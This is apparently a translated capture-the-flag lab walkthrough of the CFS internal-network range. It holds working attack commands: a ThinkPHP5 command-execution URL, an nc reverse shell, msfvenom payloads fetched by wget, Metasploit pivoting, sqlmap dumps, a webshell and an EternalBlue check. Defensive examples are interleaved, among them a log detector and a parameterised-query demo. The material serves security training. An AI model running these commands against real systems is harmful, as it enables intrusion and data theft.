CFS lab setup (reference: https://www.anquanke.com/post/id/187908#h2-10)
Lab setup
Building the lab is the part that gives me the most headaches, so here are the key configuration points.
In VMware, the most important piece is the Virtual Network Editor.
The most painful part is the bridged network setting. Why painful? Because I had never gotten bridged networking to work before. This time I finally got it straight. The key to bridged networking is to bridge to a physical adapter that actually has Internet access (if you do not pick one yourself, VMware picks one automatically, which can easily leave the VM without connectivity).
So how do you tell which adapter to use? The screenshots show it:
As the screenshot shows, my host goes online over WLAN, so in bridged mode we simply select the adapter marked in the red box.
I'll paste a link: fixing VMware bridged mode when it does not work.
If bridged mode still does not work even though you followed the steps exactly, reboot the machine. After a reboot it usually works.
You also need to configure two host-only adapters, which is straightforward: assign the IP addresses manually and disable DHCP.
To reduce mistakes, I suggest restoring VMware's network settings to their defaults and configuring from a clean state. One more thing to watch is the IP assignment on target2: after logging in to the target, first run ifconfig to see the interfaces, then assign the IP, for example: ifconfig ens33 192.168.22.22 netmask 255.255.255.0.
I forgot to mention target1: sometimes the IP it receives is not the one in the CFS lab article, but that does not affect us. We only need to re-point the site's domain in the BT (宝塔) panel.
Host scanning
target1
Scan it with Nmap:
root@kali:~# nmap -sS -A 192.168.101.91 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 11:20 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.101.91
Host is up (0.00045s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
80/tcp open http nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
888/tcp open http nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8888/tcp open http Ajenti http control panel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:1F:D6:B9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.101.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 564.90 seconds
We learn that the target has ports 21, 22, 80, 111, 3306 and others open.
Port 22 shows a username enumeration vulnerability, which we could use for brute-forcing.
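To show how a report like the one above is turned into a triage list (which ports carry CVE ids from the vulners script, which ones a script marked VULNERABLE), here is a small parser over an excerpt of that output. This is an added example written for this page, not code from the original write-up; the excerpt is constructed from the lines shown above with the columns collapsed to single spaces, and the ordering used by triage() is my own choice.

```python
import re

# Constructed excerpt of the nmap -sS -A --script=vuln output shown above
# (columns collapsed to single spaces, exactly as on the page).
NMAP_OUTPUT = """\
Nmap scan report for 192.168.101.91
Host is up (0.00045s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
80/tcp open http nginx
| http-enum:
|_ /robots.txt: Robots file
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http Ajenti http control panel
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
MAC Address: 00:0C:29:1F:D6:B9 (VMware)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_nmap(text):
    """Return one dict per port line, carrying the CVE ids and any
    VULNERABLE verdict that nmap printed in the script output under it."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(),
                "cves": [], "vulnerable": False,
            }
            ports.append(current)
            continue
        # Script output lines start with '|' and belong to the last port seen.
        if current is None or not line.startswith("|"):
            continue
        for cve in CVE_RE.findall(line):
            if cve not in current["cves"]:
                current["cves"].append(cve)
        verdict = line.upper()
        if "VULNERABLE" in verdict and "NOT VULNERABLE" not in verdict:
            current["vulnerable"] = True
    return ports


def triage(ports):
    """Open ports ordered by attention needed: script-confirmed findings first,
    then by number of CVE ids, then by port number."""
    open_ports = [p for p in ports if p["state"] == "open"]
    return sorted(open_ports,
                  key=lambda p: (not p["vulnerable"], -len(p["cves"]), p["port"]))


if __name__ == "__main__":
    for p in triage(parse_nmap(NMAP_OUTPUT)):
        flag = "VULN " if p["vulnerable"] else "     "
        print(f'{flag}{p["port"]}/{p["proto"]} {p["service"]:8} {p["version"]:32} {p["cves"]}')
```

A vulners hit is only a version match, so the parser keeps it separate from a script that actually probed and reported VULNERABLE; both are starting points for verification, not findings in themselves.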
But as usual, let's look at port 80 first.
ThinkPHP5 is a nice thing to find; it has plenty of vulnerabilities. No hurry though: first let's check the robots.txt that nmap just found.
Found a flag:
ThinkPHP5 remote command execution
Use it directly:
http://192.168.101.91/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Executed successfully.
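From the defender's side, the request above is easy to spot in the web server's access log: the route parameter s carries a backslash (a PHP namespace separator that a normal ThinkPHP route never contains), together with invokefunction, call_user_func_array and a vars[0] naming a command-execution function. The detector below is an added example, not part of the original write-up: the nginx log lines are constructed for it, the client IP and timestamps are made up, and the fourth line is a percent-encoded variant of the page's URL, included to show why decoding runs before matching.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx access-log lines (combined format). Line 3 carries the
# ThinkPHP 5 invokefunction URL from the write-up; line 4 is the same request
# percent-encoded; lines 1-2 are ordinary traffic. Client IP and times are made up.
ACCESS_LOG = r"""
192.168.101.90 - - [12/Feb/2020:11:30:01 +0800] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0"
192.168.101.90 - - [12/Feb/2020:11:30:05 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.101.90 - - [12/Feb/2020:11:31:10 +0800] "GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.101.90 - - [12/Feb/2020:11:32:00 +0800] "GET /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=ls HTTP/1.1" 200 312 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP functions that hand their argument to a shell or to the PHP interpreter.
DANGEROUS_CALLS = {"system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "eval", "assert"}


def parse_log_line(line):
    """Split one combined-format access-log line into its fields, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def thinkphp_rce_indicators(target):
    """List the indicators of a ThinkPHP 5 invokefunction request found in one
    request target (path plus query). Decode first so %5C variants are caught."""
    decoded = unquote(target)
    low = decoded.lower()
    found = []
    qs = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    route = qs.get("s", [""])[0]
    if "\\" in route:                      # namespace separator inside the route
        found.append("backslash-in-route")
    if "invokefunction" in low:
        found.append("invokefunction")
    if "call_user_func" in low:
        found.append("call_user_func")
    for key, values in qs.items():
        if key.startswith("vars[") and any(v.lower() in DANGEROUS_CALLS for v in values):
            found.append("dangerous-call:" + values[0].lower())
            break
    return found


def scan_access_log(log_text, min_indicators=2):
    """Return (ip, time, target, indicators) for every request that shows at least
    min_indicators of the pattern; a single stray keyword is not enough to alert."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        indicators = thinkphp_rce_indicators(rec["target"])
        if len(indicators) >= min_indicators:
            hits.append((rec["ip"], rec["time"], rec["target"], indicators))
    return hits


if __name__ == "__main__":
    for ip, when, target, why in scan_access_log(ACCESS_LOG):
        print(f"{when} {ip} {why}\n    {target}")
```

Requiring two indicators keeps a lone invokefunction string in a search term or referer from paging anyone; the backslash-in-route check alone is the most specific signal, since the fix for this class of bug was to validate the controller name in the s parameter.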
Reverse shell
Since we can execute commands, let's get a reverse shell.
First, on Kali, run nc -lvp 7777
Then, through the remote command execution, run nc 192.168.101.90 7777 -e /bin/bash
Once that runs we have a shell, and python -c 'import pty;pty.spawn("/bin/bash")' gives us an interactive one.
Found a flag in the web root.
Found another flag under /home on the server.
That completes the flags on target1. Next, on to target2.
target2
Testing shows wget is available on the target, which makes things easy: generate an ELF payload with msf.
Generating the ELF
Run uname -a to check the kernel:
[www@localhost public]$ uname -a
uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
So the payload we generate should be x86 as well.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=8888 -f elf >shell.elf
Getting a session on target1
Start a web server with python2: python -m SimpleHTTPServer 8080
On the target, run wget http://192.168.101.90:8080/shell.elf to download the ELF file.
Then chmod +x shell.elf to make it executable.
Next, set up the listener in Kali:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.90
lhost => 192.168.101.90
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.101.90 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
Start the listener and run the ELF on the target:
Session established.
Routing
In msf, run run get_local_subnets to list the current subnets.
192.168.101.0 is the subnet we have been working in; now we need to reach a machine on another subnet, which requires adding a route.
Run run autoroute -s 192.168.22.0/24 to add the route.
Then run autoroute -p to print the routing table.
Discovering target2
I originally wanted to use the post-exploitation arp_scanner module for ARP discovery, but the Linux ELF payload does not support that script.
So we use a different method.
Use the portscan module:
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,3389
ports => 22,3389
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 22,3389 yes Ports to scan (e.g. 22-25,80,110-900)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.22.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 100 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
For simplicity I only scanned ports 22 and 3389.
The results show that 192.168.22.22 is a Linux machine, which is the target2 we are looking for.
Since this machine sits on an internal network, there are two ways to reach it:
1. Port forwarding (inefficient)
2. Using a proxy
For smoother pivoting I use a socks4a proxy.
msf5 auxiliary(scanner/portscan/tcp) > search socks4a
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/socks4a normal No Socks4a Proxy Server
msf5 auxiliary(scanner/portscan/tcp) > use 0
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
The socks4a proxy listens on a local port by default, and through it we can reach everything in msf's routing table.
Setting up proxychains
On Kali, edit the config with vim /etc/proxychains.conf
Now we can scan through the proxy.
Run proxychains nmap -Pn -sT 192.168.22.22 to scan the target.
A note on why '-Pn -sT': socks4a cannot carry ICMP, so -Pn skips the ping probe; -sT is a full TCP connect scan, the only kind of probe a SOCKS proxy can relay.
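The reason behind -Pn -sT is visible in the protocol itself: a SOCKS4/4a client can only ask the proxy to CONNECT a TCP stream to a host and port, and the proxy answers granted or rejected, so neither an ICMP echo nor a bare SYN can be expressed. The encoder, decoder and the model of the proxy's decision below are an added example, not code from the page or from Metasploit; the host name target2.lab and the set of open ports on 192.168.22.22 are constructed.

```python
import ipaddress
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 0x01            # the only command a scan needs; 0x02 is BIND
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def _ipv4(host):
    """Return the packed address for an IPv4 literal, else None."""
    try:
        return ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        return None


def build_socks4a_connect(host, port, userid=b""):
    """Client -> proxy. SOCKS4: VN CD DSTPORT DSTIP USERID NUL.
    SOCKS4a: DSTIP is 0.0.0.x and the hostname follows, NUL-terminated, so the
    proxy resolves the name. Either way the proxy is asked for one TCP stream:
    there is no field for an ICMP echo or a bare SYN, hence nmap's -Pn -sT."""
    packed = _ipv4(host)
    if packed is not None:
        return struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, packed) + userid + b"\x00"
    head = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
    return head + userid + b"\x00" + host.encode("idna") + b"\x00"


def parse_socks4a_request(data):
    """Proxy side: decode a request built as above."""
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    userid, _, rest = data[8:].partition(b"\x00")
    host = str(ipaddress.IPv4Address(ip))
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:        # SOCKS4a marker address
        host = rest.partition(b"\x00")[0].decode("idna")
    return {"version": vn, "command": cd, "port": port, "host": host, "userid": userid}


def parse_socks4_reply(data):
    """Proxy -> client: VN=0, CD=0x5A granted / 0x5B-0x5D rejected, DSTPORT, DSTIP."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError("bad reply version byte")
    return {"granted": cd == REPLY_GRANTED, "code": cd,
            "port": port, "ip": str(ipaddress.IPv4Address(ip))}


# Constructed view of what the relay on the pivot host could connect to on target2.
OPEN_PORTS = {("192.168.22.22", 22), ("192.168.22.22", 80), ("192.168.22.22", 3306)}


def simulated_proxy(request, open_ports=OPEN_PORTS):
    """Model of the socks4a server's decision: it attempts one TCP connect through
    the session route and can only answer granted or rejected, which is exactly
    the open/closed information a connect scan reads back through it."""
    req = parse_socks4a_request(request)
    ip = _ipv4(req["host"]) or b"\x00\x00\x00\x00"
    if req["version"] != SOCKS_VERSION or req["command"] != CMD_CONNECT:
        return struct.pack("!BBH4s", 0, REPLY_REJECTED, req["port"], ip)
    code = REPLY_GRANTED if (req["host"], req["port"]) in open_ports else REPLY_REJECTED
    return struct.pack("!BBH4s", 0, code, req["port"], ip)


def connect_scan(host, ports, proxy=simulated_proxy):
    """What 'nmap -Pn -sT' learns through the proxy: a port is open iff CONNECT is granted."""
    return {p: parse_socks4_reply(proxy(build_socks4a_connect(host, p)))["granted"]
            for p in ports}


if __name__ == "__main__":
    print(connect_scan("192.168.22.22", [22, 80, 3306, 3389]))
```

The same limitation is why service fingerprinting through the proxy is slower and why UDP ports stay invisible: everything the scanner sees arrives as the outcome of a completed TCP connection on the pivot host.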
Scan results:
Next, use the proxy to reach port 80 on that IP and look at the web service.
It is BageCMS (八哥cms); out of habit I checked robots.txt.
Using the information in robots.txt, I found the admin backend.
The way in is on the homepage: its source hints at an injection.
Bring out sqlmap:
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword --dbs
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
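What sqlmap is driving here is a keyword parameter spliced into the SQL text. The pair of functions below, an added example that is neither BageCMS code nor part of the original write-up, shows the difference between that pattern and a bound parameter on an in-memory SQLite stand-in; the table and column names follow the sqlmap commands above (bagecms, bage_admin, username, password), while the rows, the bage_post table and the password placeholder are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the CMS database: an admin table with the
    column names from the page plus a content table the search page queries."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE bage_admin (username TEXT, password TEXT);
        INSERT INTO bage_admin VALUES ('admin', 'PASSWORD-HASH-PLACEHOLDER');
        CREATE TABLE bage_post (title TEXT);
        INSERT INTO bage_post VALUES ('hello world'), ('security tips');
    """)
    return db


def search_vulnerable(db, keyword):
    """The pattern sqlmap is exercising: user input becomes part of the SQL text."""
    sql = "SELECT title FROM bage_post WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, keyword):
    """Same query with a bound parameter: the input is data, never syntax."""
    sql = "SELECT title FROM bage_post WHERE title LIKE ?"
    return [row[0] for row in db.execute(sql, ("%" + keyword + "%",))]


# A constructed probe of the UNION kind that a scanner sends to the keyword parameter.
PROBE = "x' UNION SELECT username || ':' || password FROM bage_admin -- "


def compare(keyword):
    """Run both versions on a fresh database and return their results side by side."""
    db = make_db()
    try:
        vulnerable = search_vulnerable(db, keyword)
    except sqlite3.Error as e:
        # A syntax error is itself a signal: the input reached the SQL parser.
        vulnerable = ["SQL error: " + str(e)]
    return {"vulnerable": vulnerable, "safe": search_safe(db, keyword)}


if __name__ == "__main__":
    for kw in ("hello", "O'Reilly", PROBE):
        print(repr(kw), compare(kw))
```

The O'Reilly case is worth keeping in a test suite: a single apostrophe that breaks the concatenated query is how this bug usually surfaces in error logs long before anyone runs sqlmap against it, and the parameterised version treats it as an ordinary character.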
Logging in to the backend
Log in to the backend with the recovered password and find a flag.
Find the template editor and add a one-line webshell.
Then configure Proxifier
and connect with China Chopper (菜刀) to http://192.168.22.22/index.php?r=tag with the password pass.
Getting a shell
Found a flag under the site's /upload directory.
Getting an msf session
Run uname -a to check the Linux version.
This time we use bind_tcp.
bind_tcp: you choose a port (LPORT); when the payload runs on the target it listens on that port, and the attacking machine connects in.
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1111 -f elf > shell1.elf
----------------------------------------------------------------------------
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.22.22
rhost => 192.168.22.22
msf5 exploit(multi/handler) > set lport 1111
lport => 1111
Run the generated shell1.elf on the target and the session comes up.
Once it is up, same routine as before: discover the subnets and add routes.
target3
msf5 exploit(multi/handler) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal Yes WordPress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal Yes NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal Yes TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal Yes FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal Yes TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal Yes TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal Yes TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
msf5 exploit(multi/handler) > use 5
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 22,3389 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.22.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 100 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.33.0/24
rhosts => 192.168.33.0/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,445,3389
ports => 22,445,3389
msf5 auxiliary(scanner/portscan/tcp) > exploit
[+] 192.168.33.33: - 192.168.33.33:445 - TCP OPEN
[+] 192.168.33.33: - 192.168.33.33:3389 - TCP OPEN
[+] 192.168.33.22: - 192.168.33.22:22 - TCP OPEN
[*] 192.168.33.0/24: - Scanned 49 of 256 hosts (19% complete)
[*] 192.168.33.0/24: - Scanned 59 of 256 hosts (23% complete)
[*] 192.168.33.0/24: - Scanned 99 of 256 hosts (38% complete)
[*] 192.168.33.0/24: - Scanned 114 of 256 hosts (44% complete)
[*] 192.168.33.0/24: - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.33.0/24: - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.33.0/24: - Scanned 201 of 256 hosts (78% complete)
[*] 192.168.33.0/24: - Scanned 208 of 256 hosts (81% complete)
[*] 192.168.33.0/24: - Scanned 255 of 256 hosts (99% complete)
[*] 192.168.33.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Found target 192.168.33.33 with ports 445 and 3389 open.
Time to try EternalBlue.
EternalBlue
First check whether the vulnerability is present:
msf5 auxiliary(scanner/portscan/tcp) > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 auxiliary(scanner/portscan/tcp) > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.33.33:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The vulnerability is present, so exploit it!
In the end the network had a small problem and I did not pursue it further; from the published solution, the exploit does succeed.